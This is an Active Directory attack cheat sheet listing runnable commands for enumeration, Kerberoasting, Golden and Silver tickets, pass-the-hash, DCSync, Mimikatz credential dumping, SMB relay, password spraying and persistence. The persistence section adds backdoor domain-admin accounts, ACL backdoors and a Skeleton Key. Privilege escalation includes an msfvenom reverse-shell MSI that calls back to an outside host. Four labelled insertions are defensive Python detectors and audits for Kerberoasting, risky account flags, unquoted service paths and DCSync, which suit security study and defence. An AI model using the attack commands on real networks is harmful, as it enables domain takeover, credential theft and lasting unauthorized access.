⚔️ Active Directory Arsenal ⚔️

"Mastering the domain of Windows networks"

🏰 Active Directory Overview

Core Components

Component            Description
-------------------  -------------------------------------------------------
Domain Controller    Hosts the AD database and handles authentication
NTDS.dit             Database holding every AD object and the password hashes
Kerberos             Primary authentication protocol
LDAP                 Directory access protocol (port 389, LDAPS on 636)

Attack Path Overview

Typical Compromise Chain

1. Initial Access (phishing, default creds)
2. Enumeration (users, groups, SPNs)
3. Credential Access (Kerberoasting, LLMNR)
4. Lateral Movement (PsExec, WinRM, RDP)
5. Privilege Escalation (token impersonation)
6. Domain Dominance (DCSync, Golden Ticket)

High-Value Groups

  • Domain Admins - Full domain control
  • Enterprise Admins - Full forest control
  • Backup Operators - Can backup/restore files
  • Account Operators - Can modify user accounts
  • DnsAdmins - Can load DLLs on DC (privesc)

🔍 Enumeration

PowerView - Domain Enumeration

PS> Get-Domain
PS> Get-DomainController
PS> Get-DomainUser | select samaccountname
PS> Get-DomainUser -SPN
PS> Get-DomainGroup "Domain Admins" | Get-DomainGroupMember
PS> Get-DomainComputer | select dnshostname
PS> Get-DomainGPO
PS> Find-DomainShare -CheckShareAccess

BloodHound Collection

BloodHound visualizes attack paths and relationships in AD
PS> Import-Module SharpHound.ps1
PS> Invoke-BloodHound -CollectionMethod All
$ bloodhound-python -d domain.local -u user -p pass -c all -ns 10.10.10.10
$ ./SharpHound.exe -c All

LDAP Enumeration

$ ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local"
$ ldapdomaindump -u 'domain\user' -p password 10.10.10.10

SMB Enumeration

$ enum4linux -a 10.10.10.10
$ crackmapexec smb 10.10.10.0/24
$ crackmapexec smb 10.10.10.10 -u user -p pass --shares
$ smbclient -L //10.10.10.10 -U username

Native Windows Commands

C:\> net user /domain
C:\> net group "Domain Admins" /domain
C:\> net accounts /domain
C:\> nltest /domain_trusts

🎫 Kerberos Attacks

Kerberoasting

Request service tickets (TGS) for accounts that have an SPN, then crack the ticket hashes offline
PS> Get-DomainUser -SPN
PS> Invoke-Kerberoast -OutputFormat Hashcat
PS> Rubeus.exe kerberoast /outfile:hashes.txt
$ GetUserSPNs.py domain.local/user:pass -dc-ip 10.10.10.10 -request
$ hashcat -m 13100 hashes.txt wordlist.txt
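Added example, not part of the original cheat sheet: the detection side of the Kerberoasting commands above. Each of those tools asks the DC for service tickets for every SPN-bearing user, usually forcing RC4 so the hash is crackable with hashcat -m 13100; on the DC each request is Security event 4769 with TicketEncryptionType 0x17. The records and thresholds below are constructed; the field names mirror the event.

```python
"""Flag possible Kerberoasting in Windows Security event 4769 records.

Heuristic: one account requesting RC4 (etype 0x17) service tickets for many
distinct non-machine service accounts in a short window. Normal clients ask
for a handful of tickets for services they actually use and negotiate AES
(0x11/0x12); a burst of RC4 requests against accounts with SPNs is what
Invoke-Kerberoast, Rubeus kerberoast and GetUserSPNs.py produce.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType for RC4-HMAC (the hashcat -m 13100 format)

# Constructed sample 4769 records (not real logs).
SAMPLE_4769 = [
    {"time": "2024-05-01T09:00:01", "account": "alice@DOMAIN.LOCAL", "service": "WEB01$",     "etype": 0x12, "ip": "10.10.10.21"},
    {"time": "2024-05-01T09:00:05", "account": "alice@DOMAIN.LOCAL", "service": "FS01$",      "etype": 0x12, "ip": "10.10.10.21"},
    {"time": "2024-05-01T09:15:00", "account": "bob@DOMAIN.LOCAL",   "service": "svc_sql",    "etype": 0x17, "ip": "10.10.10.99"},
    {"time": "2024-05-01T09:15:01", "account": "bob@DOMAIN.LOCAL",   "service": "svc_web",    "etype": 0x17, "ip": "10.10.10.99"},
    {"time": "2024-05-01T09:15:02", "account": "bob@DOMAIN.LOCAL",   "service": "svc_backup", "etype": 0x17, "ip": "10.10.10.99"},
    {"time": "2024-05-01T09:15:03", "account": "bob@DOMAIN.LOCAL",   "service": "svc_report", "etype": 0x17, "ip": "10.10.10.99"},
    {"time": "2024-05-01T09:15:04", "account": "bob@DOMAIN.LOCAL",   "service": "krbtgt",     "etype": 0x17, "ip": "10.10.10.99"},
]


def detect_kerberoast(events, window=timedelta(minutes=5), threshold=3):
    """Return {account: sorted service names} for accounts that requested RC4
    service tickets for at least `threshold` distinct user-style service
    accounts within any span of length `window`."""
    by_account = defaultdict(list)
    for e in events:
        if e["etype"] != RC4_HMAC:
            continue
        svc = e["service"]
        # Machine accounts ($) have long random passwords and krbtgt is the
        # TGT service itself; neither is a realistic offline-cracking target.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_account[e["account"]].append((datetime.fromisoformat(e["time"]), svc))

    hits = {}
    for account, reqs in by_account.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            # Sliding window over this account's time-ordered requests.
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            distinct = {s for _, s in reqs[start:end + 1]}
            if len(distinct) >= threshold and len(distinct) > len(hits.get(account, ())):
                hits[account] = sorted(distinct)
    return hits


if __name__ == "__main__":
    for account, services in detect_kerberoast(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {account}: {', '.join(services)}")
```

Tune `threshold` to the environment: a service account that legitimately talks to many SPNs will need an allowlist, and the RC4 filter only works if AES is actually enabled on the service accounts (msDS-SupportedEncryptionTypes), which is also the mitigation that makes the cracked hashes far more expensive.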

AS-REP Roasting

Targets user accounts with "Do not require Kerberos preauthentication" set; their AS-REP can be requested without a password and cracked offline
PS> Get-DomainUser -PreauthNotRequired
PS> Rubeus.exe asreproast /format:hashcat
$ GetNPUsers.py domain.local/ -usersfile users.txt
$ hashcat -m 18200 hashes.txt wordlist.txt

Golden Ticket

Requires krbtgt hash - provides persistent DA access
PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
PS> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /ptt"'

Silver Ticket

PS> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:HASH /ptt"'

Pass-the-Ticket

PS> Rubeus.exe ptt /ticket:ticket.kirbi
$ export KRB5CCNAME=ticket.ccache

Overpass-the-Hash

PS> Rubeus.exe asktgt /user:admin /rc4:HASH /ptt
PS> Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:domain.local /ntlm:HASH"'

Unconstrained Delegation

PS> Get-DomainComputer -Unconstrained
PS> Rubeus.exe monitor /interval:5
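Added example that is not part of the original page: an audit of the userAccountControl bits that the AS-REP roasting section (DONT_REQ_PREAUTH) and the unconstrained delegation section (TRUSTED_FOR_DELEGATION) above rely on, plus the SPN-on-user condition behind Kerberoasting. The flag values are the documented ones; the input is a list of dicts shaped like LDAP results (what ldapsearch or ldapdomaindump return), and the objects below are constructed samples.

```python
"""Audit AD accounts for the flag combinations this page's Kerberos attacks need."""

# userAccountControl flag values (MS-ADTS / ADUC "Account options").
ACCOUNTDISABLE         = 0x0002
PASSWD_NOTREQD         = 0x0020
NORMAL_ACCOUNT         = 0x0200
WORKSTATION_TRUST      = 0x1000
SERVER_TRUST           = 0x2000    # domain controller computer account
DONT_EXPIRE_PASSWORD   = 0x10000
TRUSTED_FOR_DELEGATION = 0x80000   # unconstrained delegation (Get-DomainComputer -Unconstrained)
DONT_REQ_PREAUTH       = 0x400000  # "Do not require Kerberos preauthentication" (Get-DomainUser -PreauthNotRequired)

# Constructed sample objects, not real directory data.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "alice",     "userAccountControl": 0x200,    "servicePrincipalName": []},
    {"sAMAccountName": "svc_sql",   "userAccountControl": 0x10200,  "servicePrincipalName": ["MSSQLSvc/sql01.domain.local:1433"]},
    {"sAMAccountName": "legacyapp", "userAccountControl": 0x400200, "servicePrincipalName": []},
    {"sAMAccountName": "old_svc",   "userAccountControl": 0x400202, "servicePrincipalName": []},   # disabled
    {"sAMAccountName": "DC01$",     "userAccountControl": 0x82000,  "servicePrincipalName": ["HOST/dc01.domain.local"]},
    {"sAMAccountName": "WEB01$",    "userAccountControl": 0x81000,  "servicePrincipalName": ["HOST/web01.domain.local"]},
]


def audit_uac(objects):
    """Return a list of (sAMAccountName, finding) for enabled accounts whose
    flags create one of the exposures covered on this page."""
    findings = []
    for o in objects:
        uac = o["userAccountControl"]
        name = o["sAMAccountName"]
        if uac & ACCOUNTDISABLE:
            continue  # cannot authenticate: worth cleaning up, not an active exposure
        if uac & DONT_REQ_PREAUTH:
            findings.append((name, "AS-REP roastable: DONT_REQ_PREAUTH set"))
        # DCs legitimately carry TRUSTED_FOR_DELEGATION; any other host with it
        # caches forwardable TGTs of every principal that authenticates to it.
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST:
            findings.append((name, "unconstrained delegation on a non-DC"))
        if uac & NORMAL_ACCOUNT and o.get("servicePrincipalName"):
            note = "Kerberoastable: user account with SPN"
            if uac & DONT_EXPIRE_PASSWORD:
                note += " and non-expiring password"
            findings.append((name, note))
        if uac & PASSWD_NOTREQD:
            findings.append((name, "PASSWD_NOTREQD: blank password permitted"))
    return findings


if __name__ == "__main__":
    for name, finding in audit_uac(SAMPLE_OBJECTS):
        print(f"{name:12} {finding}")
```

The same bitmask logic is what PowerView's -PreauthNotRequired and -Unconstrained switches expand to as LDAP filters; running it against a full export gives the remediation list (clear the pre-auth flag, move delegating hosts to constrained/resource-based delegation, convert SPN users to group managed service accounts).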

🔄 Lateral Movement

Pass-the-Hash

$ crackmapexec smb 10.10.10.10 -u admin -H HASH
$ evil-winrm -i 10.10.10.10 -u admin -H HASH
$ impacket-psexec -hashes :HASH admin@10.10.10.10
$ impacket-wmiexec -hashes :HASH admin@10.10.10.10

PsExec

$ impacket-psexec domain.local/user:pass@10.10.10.10
C:\> PsExec.exe \\10.10.10.10 -u domain\user -p pass cmd

WMI Execution

$ impacket-wmiexec domain.local/user:pass@10.10.10.10
PS> Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "cmd" -ComputerName 10.10.10.10

WinRM / PowerShell Remoting

$ evil-winrm -i 10.10.10.10 -u user -p pass
PS> Enter-PSSession -ComputerName server01
PS> Invoke-Command -ComputerName server01 -ScriptBlock {whoami}

RDP

$ xfreerdp /u:admin /p:pass /v:10.10.10.10
$ xfreerdp /u:admin /pth:HASH /v:10.10.10.10

CrackMapExec Spray

$ crackmapexec smb 10.10.10.0/24 -u user -p pass
$ crackmapexec smb 10.10.10.0/24 -u user -H HASH --local-auth
$ crackmapexec smb 10.10.10.0/24 -u user -p pass -x "whoami"

🔒 Persistence

Golden Ticket Persistence

PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
PS> Invoke-Mimikatz -Command '"kerberos::golden /user:Admin /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /ptt"'

Skeleton Key

Patches LSASS in memory on the DC - only a reboot removes it
PS> Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.domain.local

AdminSDHolder Abuse

PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity backdoor -Rights All

Malicious GPO

PS> New-GPO -Name "Backdoor" | New-GPLink -Target "DC=domain,DC=local"

ACL Backdoors

PS> Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity backdoor -Rights All
PS> Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity backdoor -Rights DCSync

Backdoor User

C:\> net user backdoor P@ssw0rd /add /domain
C:\> net group "Domain Admins" backdoor /add /domain

⬆️ Privilege Escalation

Automated Enumeration

PS> . .\PowerUp.ps1; Invoke-AllChecks
PS> .\winPEAS.exe
PS> .\Seatbelt.exe -group=all

Token Impersonation (SeImpersonate)

C:\> whoami /priv
C:\> .\PrintSpoofer.exe -i -c cmd
C:\> .\RoguePotato.exe -r 10.10.10.10 -e cmd

AlwaysInstallElevated

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi > shell.msi
C:\> msiexec /quiet /qn /i shell.msi

Unquoted Service Paths

C:\> wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
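Added example, not the page's own code: a parser over the output of `wmic service get name,pathname` that reports exactly the condition the findstr one-liner above approximates (unquoted image path, space inside the executable path, outside C:\Windows). Useful as an audit script for finding these services before someone else does; the sample output is constructed.

```python
"""Find services whose unquoted ImagePath contains a space."""
import re

# Constructed sample of `wmic service get name,pathname` output.
SAMPLE_WMIC = """Name          PathName
Spooler       C:\\Windows\\System32\\spoolsv.exe
AcmeAgent     C:\\Program Files\\Acme Tools\\agent.exe -service
AcmeHelper    "C:\\Program Files\\Acme Tools\\helper.exe" -service
PlainSvc      C:\\Tools\\svc.exe
"""

EXE_RE = re.compile(r"^(.*?\.exe)", re.I)  # executable part of the path, before any arguments


def find_unquoted_service_paths(wmic_output, skip_prefix="c:\\windows\\"):
    """Return [(service name, executable path)] for services with an unquoted
    image path that contains a space, excluding the system directory."""
    findings = []
    lines = [line.rstrip() for line in wmic_output.splitlines() if line.strip()]
    for line in lines[1:]:  # first line is the column header
        # wmic pads columns with runs of spaces; split on the first such run.
        name, path = re.split(r"\s{2,}", line.strip(), maxsplit=1)
        if path.startswith('"'):
            continue  # quoted path: the service control manager parses it unambiguously
        m = EXE_RE.match(path)
        exe = m.group(1) if m else path
        if exe.lower().startswith(skip_prefix):
            continue  # standard users have no write access under C:\Windows by default
        if " " in exe:
            findings.append((name, exe))
    return findings


if __name__ == "__main__":
    for name, exe in find_unquoted_service_paths(SAMPLE_WMIC):
        print(f"unquoted service path: {name} -> {exe}")
```

The fix for each finding is to quote the ImagePath value of the service (sc config or the registry key under HKLM\SYSTEM\CurrentControlSet\Services) and to confirm that no intermediate directory on the path is writable by non-administrators; wmic is deprecated in current Windows builds, so the same list can be produced with Get-CimInstance Win32_Service and fed to the parser in the same column layout.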

GPP Passwords

PS> Get-GPPPassword
$ gpp-decrypt [encrypted_password]

SAM/SYSTEM Extraction

C:\> reg save HKLM\SAM SAM
C:\> reg save HKLM\SYSTEM SYSTEM
$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL

🔑 Password Attacks

Password Spraying

Try common passwords against all users - check lockout policy first!
$ crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123!'
PS> Invoke-DomainPasswordSpray -UserList users.txt -Password Password123!
$ kerbrute passwordspray -d domain.local users.txt 'Password123!'

LLMNR/NBT-NS Poisoning

$ responder -I eth0 -wrf
$ hashcat -m 5600 hashes.txt wordlist.txt

SMB Relay

$ impacket-ntlmrelayx -tf targets.txt -smb2support
$ impacket-ntlmrelayx -t ldap://dc.domain.local --escalate-user lowpriv

Hash Cracking

$ hashcat -m 1000 ntlm_hashes.txt rockyou.txt
$ hashcat -m 5600 ntlmv2_hashes.txt rockyou.txt
$ hashcat -m 13100 tgs_hashes.txt rockyou.txt
$ hashcat -m 18200 asrep_hashes.txt rockyou.txt

Mimikatz Credential Dumping

PS> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
PS> Invoke-Mimikatz -DumpCreds
C:\> mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

DCSync Attack

PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
$ secretsdump.py domain.local/admin@dc.domain.local -just-dc
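Added example that is not part of the original page: detecting the DCSync commands above from Security event 4662 on a domain controller. A DCSync call is an ordinary DRS replication request, which the DC logs as 4662 with the replication control-access rights in the Properties field (auditing of Directory Service Access has to be enabled for the event to exist). Domain controllers replicate to each other all day, so the detection is a replication right exercised by a principal that is not a DC or an allowlisted directory-sync account. The GUIDs are the real extended-right identifiers; the events and allowlists are constructed.

```python
"""Flag replication rights exercised by principals that are not domain controllers."""
import re

# Control-access right GUIDs for DRS replication (AD extended rights).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed 4662 samples; 'properties' mimics the multi-line Properties field.
# The GUID in the 'alice' event is a made-up placeholder, not a schema value.
SAMPLE_4662 = [
    {"subject": "DOMAIN\\DC02$",       "object_type": "domainDNS",
     "properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "DOMAIN\\alice",       "object_type": "user",
     "properties": "Read Property\n\t{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"},
    {"subject": "DOMAIN\\backdoor",    "object_type": "domainDNS",
     "properties": "Control Access\n\t{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2}\n\t{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"subject": "DOMAIN\\sync_svc",    "object_type": "domainDNS",
     "properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

DOMAIN_CONTROLLERS = {"DOMAIN\\DC01$", "DOMAIN\\DC02$"}  # constructed: the DC machine accounts
ALLOWED_SYNC_ACCOUNTS = {"DOMAIN\\sync_svc"}              # constructed placeholder for a directory-sync account


def detect_dcsync(events, dcs=DOMAIN_CONTROLLERS, allowed=ALLOWED_SYNC_ACCOUNTS):
    """Return [(subject, [right names])] for every 4662 in which a principal
    other than a DC or allowlisted sync account exercised a replication right."""
    alerts = []
    for e in events:
        rights = [REPLICATION_RIGHTS[g.lower()]
                  for g in GUID_RE.findall(e["properties"])
                  if g.lower() in REPLICATION_RIGHTS]
        if not rights:
            continue  # not a replication operation
        if e["subject"] in dcs or e["subject"] in allowed:
            continue  # expected replication traffic
        alerts.append((e["subject"], rights))
    return alerts


if __name__ == "__main__":
    for subject, rights in detect_dcsync(SAMPLE_4662):
        print(f"DCSync-style replication by {subject}: {', '.join(rights)}")
```

The allowlist is the weak point: anyone who can add a principal to it, or who holds the replication rights through an ACL backdoor on the domain object (the Add-DomainObjectAcl -Rights DCSync line under Persistence), produces exactly the event this flags, so the ACL on the domain head should be reviewed alongside the alert rule.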

NTDS.dit Extraction

C:\> ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q
$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
$ crackmapexec smb dc.domain.local -u admin -p pass --ntds

🛠️ Essential Tools

Enumeration Tools

  • PowerView - PowerShell AD enumeration (part of PowerSploit)
  • BloodHound - AD attack path visualization
  • SharpHound - BloodHound data collector
  • ADRecon - Comprehensive AD enumeration
  • ldapdomaindump - LDAP enumeration tool
  • enum4linux - Linux SMB enumeration

Exploitation Tools

  • Mimikatz - Credential dumping, ticket manipulation
  • Rubeus - Kerberos abuse toolkit
  • Impacket - Python SMB/MSRPC toolkit
  • CrackMapExec - Network enumeration and exploitation
  • Evil-WinRM - WinRM shell
  • Responder - LLMNR/NBT-NS poisoning

Privilege Escalation

  • PowerUp - Windows privilege escalation checker
  • winPEAS - Automated enumeration
  • Seatbelt - Security posture enumeration
  • PrintSpoofer - SeImpersonate exploitation
  • RoguePotato - Token impersonation

Essential Commands Quick Reference

Task                 Command
-------------------  ----------------------------------------
Find DCs             nltest /dclist:domain.local
List users           net user /domain
List Domain Admins   net group "Domain Admins" /domain
Password policy      net accounts /domain
Trust relationships  nltest /domain_trusts
Current user         whoami /all

Always start with BloodHound for comprehensive attack path analysis!